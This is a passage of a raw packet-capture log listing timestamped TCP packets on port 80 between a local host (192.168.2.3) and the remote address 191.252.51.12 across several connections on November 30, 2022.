                                                  Nov 30, 2022 00:37:12.979067087 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979078054 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979095936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979124069 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979130983 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979152918 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979181051 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979187965 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979208946 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979237080 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979243994 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979264975 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979293108 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979300976 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979321003 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979348898 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979355097 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979377985 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979407072 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979415894 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979435921 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979464054 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979470968 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979491949 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979520082 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979523897 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979549885 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979578018 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979583025 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979605913 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979634047 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979644060 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979660988 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979690075 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979696989 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979717970 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979746103 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979753017 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979773045 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979800940 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979806900 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979830027 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979856968 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979861975 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979883909 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979912043 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979918957 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979939938 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979968071 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.979974031 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.979996920 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980024099 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980032921 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980051994 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980078936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980087996 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980106115 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980134010 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980142117 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980163097 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980190992 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980196953 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980218887 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980246067 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980252981 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980273008 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980300903 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980305910 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980328083 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980355978 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980365992 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980385065 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980412960 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980420113 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980441093 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980468988 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980474949 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980496883 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980524063 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980531931 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980552912 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980581999 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980587959 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980609894 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980638027 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980643988 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980667114 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980695009 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980701923 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980721951 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980750084 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980755091 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980777979 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980804920 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980811119 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980833054 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980860949 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980861902 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980880976 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980890989 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980917931 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980926037 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:12.980945110 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:12.980978966 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.022317886 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.022360086 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.022389889 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.022413969 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.022418976 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.022463083 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.073549986 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.073590994 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.073726892 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090353966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090392113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090430021 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090457916 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090487957 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090492964 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090517998 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090548038 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090574980 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090578079 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090609074 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090619087 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090640068 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090655088 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090670109 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090698957 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090723038 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090729952 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090761900 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090775967 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090791941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090821028 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090825081 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090856075 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090910912 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090914011 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090945959 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.090970039 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.090976954 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091006994 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091033936 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091036081 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091065884 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091089964 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091095924 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091124058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091152906 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091154099 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091182947 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091211081 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091213942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091243982 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091269016 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091274977 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091305017 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091326952 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091332912 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091363907 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091384888 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091392994 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091424942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091448069 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091460943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091490030 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091519117 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091519117 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091550112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091577053 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091579914 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091610909 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091639042 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091639042 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091670036 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091697931 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091700077 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091727018 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091754913 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091758966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091787100 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091815948 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091834068 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091845036 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091873884 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091878891 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091902018 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091933012 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091959953 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.091963053 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.091989040 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092009068 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092017889 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092050076 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092050076 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092082024 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092108965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092114925 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092138052 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092168093 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092169046 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092202902 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092227936 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092235088 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092263937 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092292070 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092298031 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092324018 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092344046 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092354059 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092384100 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092411041 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092423916 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092441082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092468977 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092477083 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092499971 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092529058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092530012 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092560053 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092582941 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092591047 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092621088 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092647076 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092650890 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092680931 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092708111 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092710972 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092741013 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092768908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092771053 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092797995 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092824936 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092829943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092859030 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092885017 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092889071 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092916965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092947960 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.092951059 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.092979908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093004942 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093012094 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093040943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093070030 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093070984 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093097925 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093125105 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093127966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093156099 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093185902 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093185902 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093214989 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093242884 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093250036 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093272924 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093297005 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093302965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093333006 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093359947 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093360901 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093390942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093416929 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093420029 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093451023 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093477964 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093478918 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093508959 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093533993 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093538046 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093569040 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093596935 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093597889 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093626976 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093657017 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093684912 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093713045 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093743086 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093744040 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093743086 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093770027 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.093775988 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.093846083 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.129822016 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129858017 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129893064 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129920959 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129949093 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129976988 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.129985094 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130004883 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130032063 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130059958 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130072117 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130088091 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130110025 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130115986 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130137920 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130143881 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130171061 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130186081 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130198956 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130225897 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130225897 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130253077 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130266905 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130280972 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130306959 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130307913 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130337000 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130348921 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130363941 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130388975 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130392075 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130419016 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130429029 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130445957 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.130455971 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.130496979 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.188458920 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.188616991 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.188745975 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.188759089 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.188894033 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.188999891 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189071894 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189146042 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189220905 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189291000 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189361095 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189430952 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189502954 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.189790964 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.192838907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.192913055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.193025112 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.193095922 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:13.193119049 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:13.193205118 CET8049697191.252.51.12192.168.2.3
